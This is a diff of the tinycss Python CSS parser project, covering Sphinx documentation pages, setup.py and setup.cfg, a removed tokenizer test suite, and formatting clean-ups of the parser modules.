#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'tinycss', 'tinycss Documentation',
['Simon Sapin'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'tinycss', 'tinycss Documentation',
'Simon Sapin', 'tinycss', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}

View File

@ -0,0 +1,116 @@
CSS 3 Modules
=============
.. _selectors3:
Selectors 3
-----------
.. currentmodule:: tinycss.css21
On :attr:`RuleSet.selector`, the :meth:`~.token_data.TokenList.as_css` method
can be used to serialize a selector back to an Unicode string.
>>> import tinycss
>>> stylesheet = tinycss.make_parser().parse_stylesheet(
... 'div.error, #root > section:first-letter { color: red }')
>>> selector_string = stylesheet.rules[0].selector.as_css()
>>> selector_string
'div.error, #root > section:first-letter'
This string can be parsed by cssselect_. The parsed objects have information
about pseudo-elements and selector specificity.
.. _cssselect: http://packages.python.org/cssselect/
>>> import cssselect
>>> selectors = cssselect.parse(selector_string)
>>> [s.specificity() for s in selectors]
[(0, 1, 1), (1, 0, 2)]
>>> [s.pseudo_element for s in selectors]
[None, 'first-letter']
These objects can in turn be translated to XPath expressions. Note that
the translation ignores pseudo-elements, you have to account for them
somehow or reject selectors with pseudo-elements.
>>> xpath = cssselect.HTMLTranslator().selector_to_xpath(selectors[1])
>>> xpath
"descendant-or-self::*[@id = 'root']/section"
Finally, the XPath expressions can be used with lxml_ to find the matching
elements.
>>> from lxml import etree
>>> compiled_selector = etree.XPath(xpath)
>>> document = etree.fromstring('''<section id="root">
... <section id="head">Title</section>
... <section id="content">
... Lorem <section id="sub-section">ipsum</section>
... </section>
... </section>''')
>>> [el.get('id') for el in compiled_selector(document)]
['head', 'content']
.. _lxml: http://lxml.de/xpathxslt.html#xpath
Find more details in the `cssselect documentation`_.
.. _cssselect documentation: http://packages.python.org/cssselect/
.. module:: tinycss.color3
Color 3
-------
This module implements parsing for the *<color>* values, as defined in
`CSS 3 Color <http://www.w3.org/TR/css3-color/>`_.
The (deprecated) CSS2 system colors are not supported, but you can
easily test for them if you want as they are simple ``IDENT`` tokens.
For example::
if token.type == 'IDENT' and token.value == 'ButtonText':
return ...
All other values types *are* supported:
* Basic, extended (X11) and transparent color keywords;
* 3-digit and 6-digit hexadecimal notations;
* ``rgb()``, ``rgba()``, ``hsl()`` and ``hsla()`` functional notations.
* ``currentColor``
This module does not integrate with a parser class. Instead, it provides
a function that can parse tokens as found in :attr:`.css21.Declaration.value`,
for example.
.. autofunction:: parse_color
.. autofunction:: parse_color_string
.. autoclass:: RGBA
.. module:: tinycss.page3
Paged Media 3
-------------
.. autoclass:: CSSPage3Parser
.. autoclass:: MarginRule
.. module:: tinycss.fonts3
Fonts 3
-------
.. autoclass:: CSSFonts3Parser
.. autoclass:: FontFaceRule
.. autoclass:: FontFeatureValuesRule
.. autoclass:: FontFeatureRule
Other CSS modules
-----------------
To add support for new CSS syntax, see :ref:`extending`.

View File

@ -0,0 +1,97 @@
.. _extending:
Extending the parser
====================
Modules such as :mod:`.page3` extend the CSS 2.1 parser to add support for
CSS 3 syntax.
They do so by sub-classing :class:`.css21.CSS21Parser` and overriding/extending
some of its methods. If fact, the parser is made of methods in a class
(rather than a set of functions) solely to enable this kind of sub-classing.
tinycss is designed to enable you to have parser subclasses outside of
tinycss, without monkey-patching. If however the syntax you added is for a
W3C specification, consider including your subclass in a new tinycss module
and send a pull request: see :ref:`hacking`.
.. currentmodule:: tinycss.css21
Example: star hack
------------------
.. _star hack: https://en.wikipedia.org/wiki/CSS_filter#Star_hack
The `star hack`_ uses invalid declarations that are only parsed by some
versions of Internet Explorer. By default, tinycss ignores invalid
declarations and logs an error.
>>> from tinycss.css21 import CSS21Parser
>>> css = '#elem { width: [W3C Model Width]; *width: [BorderBox Model]; }'
>>> stylesheet = CSS21Parser().parse_stylesheet(css)
>>> stylesheet.errors
[ParseError('Parse error at 1:35, expected a property name, got DELIM',)]
>>> [decl.name for decl in stylesheet.rules[0].declarations]
['width']
If for example a minifier based on tinycss wants to support the star hack,
it can by extending the parser::
>>> class CSSStarHackParser(CSS21Parser):
... def parse_declaration(self, tokens):
... has_star_hack = (tokens[0].type == 'DELIM' and tokens[0].value == '*')
... if has_star_hack:
... tokens = tokens[1:]
... declaration = super(CSSStarHackParser, self).parse_declaration(tokens)
... declaration.has_star_hack = has_star_hack
... return declaration
...
>>> stylesheet = CSSStarHackParser().parse_stylesheet(css)
>>> stylesheet.errors
[]
>>> [(d.name, d.has_star_hack) for d in stylesheet.rules[0].declarations]
[('width', False), ('width', True)]
This class extends the :meth:`~CSS21Parser.parse_declaration` method.
It removes any ``*`` delimeter :class:`~.token_data.Token` at the start of
a declaration, and adds a ``has_star_hack`` boolean attribute on parsed
:class:`Declaration` objects: ``True`` if a ``*`` was removed, ``False`` for
“normal” declarations.
Parser methods
--------------
In addition to methods of the user API (see :ref:`parsing`), here
are the methods of the CSS 2.1 parser that can be overriden or extended:
.. automethod:: CSS21Parser.parse_rules
.. automethod:: CSS21Parser.read_at_rule
.. automethod:: CSS21Parser.parse_at_rule
.. automethod:: CSS21Parser.parse_media
.. automethod:: CSS21Parser.parse_page_selector
.. automethod:: CSS21Parser.parse_declarations_and_at_rules
.. automethod:: CSS21Parser.parse_ruleset
.. automethod:: CSS21Parser.parse_declaration_list
.. automethod:: CSS21Parser.parse_declaration
.. automethod:: CSS21Parser.parse_value_priority
Unparsed at-rules
-----------------
.. autoclass:: AtRule
.. module:: tinycss.parsing
Parsing helper functions
------------------------
The :mod:`tinycss.parsing` module contains helper functions for parsing
tokens into a more structured form:
.. autofunction:: strip_whitespace
.. autofunction:: split_on_comma
.. autofunction:: validate_value
.. autofunction:: validate_block
.. autofunction:: validate_any

View File

@ -0,0 +1,117 @@
.. _hacking:
Hacking tinycss
===============
.. highlight:: sh
Bugs and feature requests
-------------------------
Bug reports, feature requests and other issues should got to the
`tinycss issue tracker`_ on Github. Any suggestion or feedback is welcome.
Please include in full any error message, trackback or other detail that
could be helpful.
.. _tinycss issue tracker: https://github.com/SimonSapin/tinycss/issues
Installing the development version
----------------------------------
First, get the latest git version::
git clone https://github.com/SimonSapin/tinycss.git
cd tinycss
You will need Cython_ and pytest_. Installing in a virtualenv_ is recommended::
virtualenv env
. env/bin/activate
pip install Cython pytest
.. _Cython: http://cython.org/
.. _pytest: http://pytest.org/
.. _virtualenv: http://www.virtualenv.org/
Then, install tinycss in-place with pips *editable mode*. This will also
build the accelerators::
pip install -e .
Running the test suite
----------------------
Once you have everything installed (see above), just run pytest from the
*tinycss* directory::
py.test
If the accelerators are not available for some reason, use the
``TINYCSS_SKIP_SPEEDUPS_TESTS`` environment variable::
TINYCSS_SKIP_SPEEDUPS_TESTS=1 py.test
If you get test failures on a fresh git clone, something may have gone wrong
during the installation. Otherwise, you probably found a bug. Please
`report it <#bugs-and-feature-requests>`_.
Test in multiple Python versions with tox
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
tox_ automatically creates virtualenvs for various Python versions and
runs the test suite there::
pip install tox
Change to the projects root directory and just run::
tox
.. _tox: http://tox.testrun.org/
tinycss comes with a pre-configured ``tox.ini`` file to test in CPython
2.6, 2.7, 3.1 and 3.2 as well as PyPy. You can change that with the ``-e``
parameter::
tox -e py27,py32
If you use ``--`` in the arguments passed to tox, further arguments
are passed to the underlying ``py.test`` command::
tox -- -x --pdb
Building the documentation
--------------------------
This documentation is made with Sphinx_::
pip install Sphinx
.. _Sphinx: http://sphinx.pocoo.org/
To build the HTML version of the documentation, change to the projects root
directory and run::
python setup.py build_sphinx
The built HTML files are in ``docs/_build/html``.
Making a patch and a pull request
---------------------------------
If you would like to see something included in tinycss, please fork
`the repository <https://github.com/SimonSapin/tinycss/>`_ on Github
and make a pull request. Make sure to include tests for your change.
Mailing-list
------------
tinycss does not have a mailing-list of its own for now, but the
`WeasyPrint mailing-list <http://weasyprint.org/community/>`_
is appropriate to discuss it.

View File

@ -0,0 +1,50 @@
.. include:: ../README.rst
Requirements
------------
`tinycss is tested <https://travis-ci.org/Kozea/tinycss>`_ on CPython 2.7, 3.3,
3.4 and 3.5 as well as PyPy 5.3 and PyPy3 2.4; it should work on any
implementation of **Python 2.7 or later version (including 3.x)** of the
language.
Cython_ is used for optional accelerators but is only required for
development versions on tinycss.
.. _Cython: http://cython.org/
Installation
------------
Installing with `pip <http://www.pip-installer.org/>`_ should Just Work:
.. code-block:: sh
pip install tinycss
The release tarballs contain pre-*cythoned* C files for the accelerators:
you will not need Cython to install like this.
If the accelerators fail to build for some reason, tinycss will
print a warning and fall back to a pure-Python installation.
Documentation
-------------
.. Have this page in the sidebar, but do not show a link to itself here:
.. toctree::
:hidden:
self
.. toctree::
:maxdepth: 2
parsing
css3
extending
hacking
changelog

View File

@ -0,0 +1,97 @@
Parsing with tinycss
====================
.. highlight:: python
Quickstart
----------
Import *tinycss*, make a parser object with the features you want,
and parse a stylesheet:
.. doctest::
>>> import tinycss
>>> parser = tinycss.make_parser('page3')
>>> stylesheet = parser.parse_stylesheet_bytes(b'''@import "foo.css";
... p.error { color: red } @lorem-ipsum;
... @page tables { size: landscape }''')
>>> stylesheet.rules
[<ImportRule 1:1 foo.css>, <RuleSet at 2:5 p.error>, <PageRule 3:5 ('tables', None)>]
>>> stylesheet.errors
[ParseError('Parse error at 2:29, unknown at-rule in stylesheet context: @lorem-ipsum',)]
Youll get a :class:`~tinycss.css21.Stylesheet` object which contains
all the parsed content as well as a list of encountered errors.
Parsers
-------
Parsers are subclasses of :class:`tinycss.css21.CSS21Parser`. Various
subclasses add support for more syntax. You can choose which features to
enable by making a new parser class with multiple inheritance, but there
is also a convenience function to do that:
.. module:: tinycss
.. autofunction:: make_parser
.. module:: tinycss.css21
.. _parsing:
Parsing a stylesheet
~~~~~~~~~~~~~~~~~~~~
Parser classes have three different methods to parse CSS stylesheet,
depending on whether you have a file, a byte string, or an Unicode string.
.. autoclass:: CSS21Parser
:members: parse_stylesheet_file, parse_stylesheet_bytes, parse_stylesheet
Parsing a ``style`` attribute
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. automethod:: CSS21Parser.parse_style_attr
Parsed objects
--------------
These data structures make up the results of the various parsing methods.
.. autoclass:: tinycss.parsing.ParseError()
.. autoclass:: Stylesheet()
.. note::
All subsequent objects have :obj:`line` and :obj:`column` attributes (not
repeated every time fore brevity) that indicate where in the CSS source
this object was read.
.. autoclass:: RuleSet()
.. autoclass:: ImportRule()
.. autoclass:: MediaRule()
.. autoclass:: PageRule()
.. autoclass:: Declaration()
Tokens
------
Some parts of a stylesheet (such as selectors in CSS 2.1 or property values)
are not parsed by tinycss. They appear as tokens instead.
.. module:: tinycss.token_data
.. autoclass:: TokenList()
:member-order: bysource
:members:
.. autoclass:: Token()
:members:
.. autoclass:: tinycss.speedups.CToken()
.. autoclass:: ContainerToken()
:members:
.. autoclass:: FunctionToken()

View File

@ -0,0 +1,23 @@
[build_sphinx]
source-dir = docs
build-dir = docs/_build
[upload_sphinx]
upload-dir = docs/_build/html
[aliases]
test = pytest
[tool:pytest]
addopts = --flake8 --isort --cov --ignore=test/cairosvg_reference
norecursedirs = dist .cache .git build *.egg-info .eggs venv cairosvg_reference
flake8-ignore = docs/conf.py ALL
isort_ignore =
docs/conf.py
setup.py
[egg_info]
tag_build =
tag_date = 0
tag_svn_revision = 0

View File

@ -0,0 +1,127 @@
import os.path
import re
import sys
from distutils.errors import (
CCompilerError, DistutilsExecError, DistutilsPlatformError)
from setuptools import Extension, setup
try:
from Cython.Distutils import build_ext
import Cython.Compiler.Version
CYTHON_INSTALLED = True
except ImportError:
from distutils.command.build_ext import build_ext
CYTHON_INSTALLED = False
ext_errors = (CCompilerError, DistutilsExecError, DistutilsPlatformError)
if sys.platform == 'win32' and sys.version_info > (2, 6):
# 2.6's distutils.msvc9compiler can raise an IOError when failing to
# find the compiler
ext_errors += (IOError,)
class BuildFailed(Exception):
pass
class ve_build_ext(build_ext):
# This class allows C extension building to fail.
def run(self):
try:
build_ext.run(self)
except DistutilsPlatformError:
raise BuildFailed
def build_extension(self, ext):
try:
build_ext.build_extension(self, ext)
except ext_errors:
raise BuildFailed
ROOT = os.path.dirname(__file__)
with open(os.path.join(ROOT, 'tinycss', 'version.py')) as fd:
VERSION = re.search("VERSION = '([^']+)'", fd.read()).group(1)
with open(os.path.join(ROOT, 'README.rst'), 'rb') as fd:
README = fd.read().decode('utf8')
needs_pytest = {'pytest', 'test', 'ptr'}.intersection(sys.argv)
pytest_runner = ['pytest-runner'] if needs_pytest else []
def run_setup(with_extension):
if with_extension:
extension_path = os.path.join('tinycss', 'speedups')
if CYTHON_INSTALLED:
extension_path += '.pyx'
print('Building with Cython %s.' % Cython.Compiler.Version.version)
else:
extension_path += '.c'
if not os.path.exists(extension_path):
print("WARNING: Trying to build without Cython, but "
"pre-generated '%s' does not seem to be available."
% extension_path)
else:
print('Building without Cython.')
kwargs = dict(
cmdclass=dict(build_ext=ve_build_ext),
ext_modules=[Extension('tinycss.speedups',
sources=[extension_path])],
)
else:
kwargs = dict()
setup(
name='tinycss',
version=VERSION,
url='http://tinycss.readthedocs.io/',
license='BSD',
author='Simon Sapin',
author_email='simon.sapin@exyr.org',
description='tinycss is a complete yet simple CSS parser for Python.',
long_description=README,
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
],
setup_requires=pytest_runner,
tests_require=[
'pytest-cov', 'pytest-flake8', 'pytest-isort', 'pytest-runner'],
extras_require={'test': (
'pytest-runner', 'pytest-cov', 'pytest-flake8', 'pytest-isort')},
packages=['tinycss', 'tinycss.tests'],
**kwargs
)
IS_PYPY = hasattr(sys, 'pypy_translation_info')
try:
run_setup(not IS_PYPY)
except BuildFailed:
BUILD_EXT_WARNING = ('WARNING: The extension could not be compiled, '
'speedups are not enabled.')
print('*' * 75)
print(BUILD_EXT_WARNING)
print('Failure information, if any, is above.')
print('Retrying the build without the Cython extension now.')
print('*' * 75)
run_setup(False)
print('*' * 75)
print(BUILD_EXT_WARNING)
print('Plain-Python installation succeeded.')
print('*' * 75)

File diff suppressed because it is too large Load Diff

View File

@ -1,310 +0,0 @@
# coding: utf8
"""
Tests for the tokenizer
-----------------------
:copyright: (c) 2012 by Simon Sapin.
:license: BSD, see LICENSE for more details.
"""
from __future__ import unicode_literals
import sys
import os
import pytest
from tinycss.tokenizer import (
python_tokenize_flat, cython_tokenize_flat, regroup)
def test_speedups():
if os.environ.get('TINYCSS_SKIP_SPEEDUPS_TESTS'): # pragma: no cover
return
assert cython_tokenize_flat is not None, (
'Cython speedups are not installed, related tests will '
'be skipped. Set the TINYCSS_SKIP_SPEEDUPS_TESTS environment '
'variable if this is expected (eg. on PyPy).')
@pytest.mark.parametrize(('tokenize', 'css_source', 'expected_tokens'), [
(tokenize,) + test_data
for tokenize in (python_tokenize_flat, cython_tokenize_flat)
for test_data in [
('', []),
('red -->',
[('IDENT', 'red'), ('S', ' '), ('CDC', '-->')]),
# Longest match rule: no CDC
('red-->',
[('IDENT', 'red--'), ('DELIM', '>')]),
(r'''p[example="\
foo(int x) {\
this.x = x;\
}\
"]''', [
('IDENT', 'p'),
('[', '['),
('IDENT', 'example'),
('DELIM', '='),
('STRING', 'foo(int x) { this.x = x;}'),
(']', ']')]),
#### Numbers are parsed
('42 .5 -4pX 1.25em 30%',
[('INTEGER', 42), ('S', ' '),
('NUMBER', .5), ('S', ' '),
# units are normalized to lower-case:
('DIMENSION', -4, 'px'), ('S', ' '),
('DIMENSION', 1.25, 'em'), ('S', ' '),
('PERCENTAGE', 30, '%')]),
#### URLs are extracted
('url(foo.png)', [('URI', 'foo.png')]),
('url("foo.png")', [('URI', 'foo.png')]),
#### Escaping
(r'/* Comment with a \ backslash */',
[('COMMENT', '/* Comment with a \ backslash */')]), # Unchanged
# backslash followed by a newline in a string: ignored
('"Lorem\\\nIpsum"', [('STRING', 'LoremIpsum')]),
# backslash followed by a newline outside a string: stands for itself
('Lorem\\\nIpsum', [
('IDENT', 'Lorem'), ('DELIM', '\\'),
('S', '\n'), ('IDENT', 'Ipsum')]),
# Cancel the meaning of special characters
(r'"Lore\m Ipsum"', [('STRING', 'Lorem Ipsum')]), # or not specal
(r'"Lorem \49psum"', [('STRING', 'Lorem Ipsum')]),
(r'"Lorem \49 psum"', [('STRING', 'Lorem Ipsum')]),
(r'"Lorem\"Ipsum"', [('STRING', 'Lorem"Ipsum')]),
(r'"Lorem\\Ipsum"', [('STRING', r'Lorem\Ipsum')]),
(r'"Lorem\5c Ipsum"', [('STRING', r'Lorem\Ipsum')]),
(r'Lorem\+Ipsum', [('IDENT', 'Lorem+Ipsum')]),
(r'Lorem+Ipsum', [('IDENT', 'Lorem'), ('DELIM', '+'), ('IDENT', 'Ipsum')]),
(r'url(foo\).png)', [('URI', 'foo).png')]),
# Unicode and backslash escaping
('\\26 B', [('IDENT', '&B')]),
('\\&B', [('IDENT', '&B')]),
('@\\26\tB', [('ATKEYWORD', '@&B')]),
('@\\&B', [('ATKEYWORD', '@&B')]),
('#\\26\nB', [('HASH', '#&B')]),
('#\\&B', [('HASH', '#&B')]),
('\\26\r\nB(', [('FUNCTION', '&B(')]),
('\\&B(', [('FUNCTION', '&B(')]),
(r'12.5\000026B', [('DIMENSION', 12.5, '&b')]),
(r'12.5\0000263B', [('DIMENSION', 12.5, '&3b')]), # max 6 digits
(r'12.5\&B', [('DIMENSION', 12.5, '&b')]),
(r'"\26 B"', [('STRING', '&B')]),
(r"'\000026B'", [('STRING', '&B')]),
(r'"\&B"', [('STRING', '&B')]),
(r'url("\26 B")', [('URI', '&B')]),
(r'url(\26 B)', [('URI', '&B')]),
(r'url("\&B")', [('URI', '&B')]),
(r'url(\&B)', [('URI', '&B')]),
(r'Lorem\110000Ipsum', [('IDENT', 'Lorem\uFFFDIpsum')]),
#### Bad strings
# String ends at EOF without closing: no error, parsed
('"Lorem\\26Ipsum', [('STRING', 'Lorem&Ipsum')]),
# Unescaped newline: ends the string, error, unparsed
('"Lorem\\26Ipsum\n', [
('BAD_STRING', r'"Lorem\26Ipsum'), ('S', '\n')]),
# Tokenization restarts after the newline, so the second " starts
# a new string (which ends at EOF without errors, as above.)
('"Lorem\\26Ipsum\ndolor" sit', [
('BAD_STRING', r'"Lorem\26Ipsum'), ('S', '\n'),
('IDENT', 'dolor'), ('STRING', ' sit')]),
]])
def test_tokens(tokenize, css_source, expected_tokens):
if tokenize is None: # pragma: no cover
pytest.skip('Speedups not available')
sources = [css_source]
if sys.version_info[0] < 3:
# On Python 2.x, ASCII-only bytestrings can be used
# where Unicode is expected.
sources.append(css_source.encode('ascii'))
for css_source in sources:
tokens = tokenize(css_source, ignore_comments=False)
result = [
(token.type, token.value) + (
() if token.unit is None else (token.unit,))
for token in tokens
]
assert result == expected_tokens
@pytest.mark.parametrize('tokenize', [
python_tokenize_flat, cython_tokenize_flat])
def test_positions(tokenize):
"""Test the reported line/column position of each token."""
if tokenize is None: # pragma: no cover
pytest.skip('Speedups not available')
css = '/* Lorem\nipsum */\fa {\n color: red;\tcontent: "dolor\\\fsit" }'
tokens = tokenize(css, ignore_comments=False)
result = [(token.type, token.line, token.column) for token in tokens]
assert result == [
('COMMENT', 1, 1), ('S', 2, 9),
('IDENT', 3, 1), ('S', 3, 2), ('{', 3, 3),
('S', 3, 4), ('IDENT', 4, 5), (':', 4, 10),
('S', 4, 11), ('IDENT', 4, 12), (';', 4, 15), ('S', 4, 16),
('IDENT', 4, 17), (':', 4, 24), ('S', 4, 25), ('STRING', 4, 26),
('S', 5, 5), ('}', 5, 6)]
@pytest.mark.parametrize(('tokenize', 'css_source', 'expected_tokens'), [
(tokenize,) + test_data
for tokenize in (python_tokenize_flat, cython_tokenize_flat)
for test_data in [
('', []),
(r'Lorem\26 "i\psum"4px', [
('IDENT', 'Lorem&'), ('STRING', 'ipsum'), ('DIMENSION', 4)]),
('not([[lorem]]{ipsum (42)})', [
('FUNCTION', 'not', [
('[', [
('[', [
('IDENT', 'lorem'),
]),
]),
('{', [
('IDENT', 'ipsum'),
('S', ' '),
('(', [
('INTEGER', 42),
])
])
])]),
# Close everything at EOF, no error
('a[b{"d', [
('IDENT', 'a'),
('[', [
('IDENT', 'b'),
('{', [
('STRING', 'd'),
]),
]),
]),
# Any remaining ), ] or } token is a nesting error
('a[b{d]e}', [
('IDENT', 'a'),
('[', [
('IDENT', 'b'),
('{', [
('IDENT', 'd'),
(']', ']'), # The error is visible here
('IDENT', 'e'),
]),
]),
]),
# ref:
('a[b{d}e]', [
('IDENT', 'a'),
('[', [
('IDENT', 'b'),
('{', [
('IDENT', 'd'),
]),
('IDENT', 'e'),
]),
]),
]])
def test_token_grouping(tokenize, css_source, expected_tokens):
if tokenize is None: # pragma: no cover
pytest.skip('Speedups not available')
tokens = regroup(tokenize(css_source, ignore_comments=False))
result = list(jsonify(tokens))
assert result == expected_tokens
def jsonify(tokens):
"""Turn tokens into "JSON-compatible" data structures."""
for token in tokens:
if token.type == 'FUNCTION':
yield (token.type, token.function_name,
list(jsonify(token.content)))
elif token.is_container:
yield token.type, list(jsonify(token.content))
else:
yield token.type, token.value
@pytest.mark.parametrize(('tokenize', 'ignore_comments', 'expected_tokens'), [
(tokenize,) + test_data
for tokenize in (python_tokenize_flat, cython_tokenize_flat)
for test_data in [
(False, [
('COMMENT', '/* lorem */'),
('S', ' '),
('IDENT', 'ipsum'),
('[', [
('IDENT', 'dolor'),
('COMMENT', '/* sit */'),
]),
('BAD_COMMENT', '/* amet')
]),
(True, [
('S', ' '),
('IDENT', 'ipsum'),
('[', [
('IDENT', 'dolor'),
]),
]),
]])
def test_comments(tokenize, ignore_comments, expected_tokens):
if tokenize is None: # pragma: no cover
pytest.skip('Speedups not available')
css_source = '/* lorem */ ipsum[dolor/* sit */]/* amet'
tokens = regroup(tokenize(css_source, ignore_comments))
result = list(jsonify(tokens))
assert result == expected_tokens
@pytest.mark.parametrize(('tokenize', 'css_source'), [
(tokenize, test_data)
for tokenize in (python_tokenize_flat, cython_tokenize_flat)
for test_data in [
r'''p[example="\
foo(int x) {\
this.x = x;\
}\
"]''',
'"Lorem\\26Ipsum\ndolor" sit',
'/* Lorem\nipsum */\fa {\n color: red;\tcontent: "dolor\\\fsit" }',
'not([[lorem]]{ipsum (42)})',
'a[b{d]e}',
'a[b{"d',
]])
def test_token_serialize_css(tokenize, css_source):
if tokenize is None: # pragma: no cover
pytest.skip('Speedups not available')
for _regroup in [regroup, lambda x: x]:
tokens = _regroup(tokenize(css_source, ignore_comments=False))
result = ''.join(token.as_css() for token in tokens)
assert result == css_source
@pytest.mark.parametrize(('tokenize', 'css_source'), [
(tokenize, test_data)
for tokenize in (python_tokenize_flat, cython_tokenize_flat)
for test_data in [
'(8, foo, [z])', '[8, foo, (z)]', '{8, foo, [z]}', 'func(8, foo, [z])'
]
])
def test_token_api(tokenize, css_source):
if tokenize is None: # pragma: no cover
pytest.skip('Speedups not available')
tokens = list(regroup(tokenize(css_source)))
assert len(tokens) == 1
token = tokens[0]
expected_len = 7 # 2 spaces, 2 commas, 3 others.
assert len(token.content) == expected_len

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
tinycss
-------
@ -9,17 +9,18 @@
:license: BSD, see LICENSE for more details.
"""
import sys
from .version import VERSION
__version__ = VERSION
from .css21 import CSS21Parser
from .page3 import CSSPage3Parser
from .fonts3 import CSSFonts3Parser
__version__ = VERSION
PARSER_MODULES = {
'page3': CSSPage3Parser,
'fonts3': CSSFonts3Parser,
}
@ -30,6 +31,8 @@ def make_parser(*features, **kwargs):
Positional arguments are base classes the new parser class will extend.
The string ``'page3'`` is accepted as short for
:class:`~page3.CSSPage3Parser`.
The string ``'fonts3'`` is accepted as short for
:class:`~fonts3.CSSFonts3Parser`.
:param kwargs:
Keyword arguments are passed to the parsers constructor.
:returns:

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
tinycss.colors3
---------------
@ -13,7 +13,8 @@
:license: BSD, see LICENSE for more details.
"""
from __future__ import unicode_literals, division
from __future__ import division, unicode_literals
import collections
import itertools
import re

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
tinycss.css21
-------------
@ -11,13 +11,15 @@
"""
from __future__ import unicode_literals
from itertools import chain, islice
from .decoding import decode
from .parsing import (
ParseError, remove_whitespace, split_on_comma, strip_whitespace,
validate_any, validate_value)
from .token_data import TokenList
from .tokenizer import tokenize_grouped
from .parsing import (strip_whitespace, remove_whitespace, split_on_comma,
validate_value, validate_block, validate_any, ParseError)
# stylesheet : [ CDO | CDC | S | statement ]*;
@ -293,7 +295,6 @@ class ImportRule(object):
' {0.uri}>'.format(self))
def _remove_at_charset(tokens):
"""Remove any valid @charset at the beggining of a token stream.
@ -307,8 +308,8 @@ def _remove_at_charset(tokens):
header = list(islice(tokens, 4))
if [t.type for t in header] == ['ATKEYWORD', 'S', 'STRING', ';']:
atkw, space, string, semicolon = header
if ((atkw.value, space.value) == ('@charset', ' ')
and string.as_css()[0] == '"'):
if ((atkw.value, space.value) == ('@charset', ' ') and
string.as_css()[0] == '"'):
# Found a valid @charset rule, only keep whats after it.
return tokens
return chain(header, tokens)
@ -331,7 +332,7 @@ class CSS21Parser(object):
# User API:
def parse_stylesheet_file(self, css_file, protocol_encoding=None,
linking_encoding=None, document_encoding=None):
linking_encoding=None, document_encoding=None):
"""Parse a stylesheet from a file or filename.
Character encoding-related parameters and behavior are the same
@ -482,8 +483,6 @@ class CSS21Parser(object):
return AtRule(at_keyword, head, body,
at_keyword_token.line, at_keyword_token.column)
at_page_allowed_contexts = ['stylesheet']
def parse_at_rule(self, rule, previous_rules, errors, context):
"""Parse an at-rule.
@ -510,12 +509,13 @@ class CSS21Parser(object):
"""
if rule.at_keyword == '@page':
if context not in self.at_page_allowed_contexts:
if context != 'stylesheet':
raise ParseError(rule, '@page rule not allowed in ' + context)
selector, specificity = self.parse_page_selector(rule.head)
if rule.body is None:
raise ParseError(rule,
'invalid {0} rule: missing block'.format(rule.at_keyword))
raise ParseError(
rule, 'invalid {0} rule: missing block'.format(
rule.at_keyword))
declarations, at_rules, rule_errors = \
self.parse_declarations_and_at_rules(rule.body, '@page')
errors.extend(rule_errors)
@ -529,32 +529,34 @@ class CSS21Parser(object):
raise ParseError(rule, 'expected media types for @media')
media = self.parse_media(rule.head)
if rule.body is None:
raise ParseError(rule,
'invalid {0} rule: missing block'.format(rule.at_keyword))
raise ParseError(
rule, 'invalid {0} rule: missing block'.format(
rule.at_keyword))
rules, rule_errors = self.parse_rules(rule.body, '@media')
errors.extend(rule_errors)
return MediaRule(media, rules, rule.line, rule.column)
elif rule.at_keyword == '@import':
if context != 'stylesheet':
raise ParseError(rule,
'@import rule not allowed in ' + context)
raise ParseError(
rule, '@import rule not allowed in ' + context)
for previous_rule in previous_rules:
if previous_rule.at_keyword not in ('@charset', '@import'):
if previous_rule.at_keyword:
type_ = 'an {0} rule'.format(previous_rule.at_keyword)
else:
type_ = 'a ruleset'
raise ParseError(previous_rule,
raise ParseError(
previous_rule,
'@import rule not allowed after ' + type_)
head = rule.head
if not head:
raise ParseError(rule,
'expected URI or STRING for @import rule')
raise ParseError(
rule, 'expected URI or STRING for @import rule')
if head[0].type not in ('URI', 'STRING'):
raise ParseError(rule,
'expected URI or STRING for @import rule, got '
+ head[0].type)
raise ParseError(
rule, 'expected URI or STRING for @import rule, got ' +
head[0].type)
uri = head[0].value
media = self.parse_media(strip_whitespace(head[1:]))
if rule.body is not None:
@ -567,8 +569,9 @@ class CSS21Parser(object):
raise ParseError(rule, 'mis-placed or malformed @charset rule')
else:
raise ParseError(rule, 'unknown at-rule in {0} context: {1}'
.format(context, rule.at_keyword))
raise ParseError(
rule, 'unknown at-rule in {0} context: {1}'.format(
context, rule.at_keyword))
def parse_media(self, tokens):
"""For CSS 2.1, parse a list of media types.
@ -590,8 +593,9 @@ class CSS21Parser(object):
if types == ['IDENT']:
media_types.append(part[0].value)
else:
raise ParseError(tokens[0], 'expected a media type'
+ ((', got ' + ', '.join(types)) if types else ''))
raise ParseError(
tokens[0], 'expected a media type' +
((', got ' + ', '.join(types)) if types else ''))
return media_types
def parse_page_selector(self, tokens):
@ -609,8 +613,8 @@ class CSS21Parser(object):
"""
if not tokens:
return None, (0, 0)
if (len(tokens) == 2 and tokens[0].type == ':'
and tokens[1].type == 'IDENT'):
if (len(tokens) == 2 and tokens[0].type == ':' and
tokens[1].type == 'IDENT'):
pseudo_class = tokens[1].value
specificity = {
'first': (1, 0), 'left': (0, 1), 'right': (0, 1),
@ -679,8 +683,9 @@ class CSS21Parser(object):
for one ruleset.
:return:
a tuple of a :class:`RuleSet` and an error list.
